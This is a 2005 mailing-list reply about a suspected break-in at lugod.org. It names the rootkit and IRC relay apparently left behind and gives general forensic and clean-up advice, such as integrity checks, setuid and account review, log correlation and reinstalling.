[vox-tech] lugod.org cracked?

ME dugan at passwall.com
Tue Feb 15 13:08:24 PST 2005

2 tools:
1) Rootkit with local exploits
2) IRC Relay with authentication and bounce... probably a file server for
dcc requests of pr0n, movies, or music.

You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have
installed.

You will want to find all setUID scripts/apps on the system and check
/etc/password for new accounts.

It would be a good idea to track the time of the event to the files with
the earliest creations stamp. Look for any files owned by apache user or
group on the system which are not where they should be (most will be in
publicly writable spaces like /tmp /var/tmp /usr/tmp, etc)

Associate the creation time of these files with entries in your web server
logs.... you may not be able to find an error with the cirrect time if a
service/daemon faulted before it could write a log entry.

Is lugod.org running an file integrity checker?

Inspect all php files for modification and trojans that may have been left
behind.

You may have a cache of videos/music/stuff left behind too.

You don't know what other rootkits may have been used. even init could
have been trojaned. It is also possible for modules to be loaded and
hidden from listing/view.

Check everything. If that is too much work, backup to tape, clean install,
and only move files over that have been sanitized.

HTH,
-ME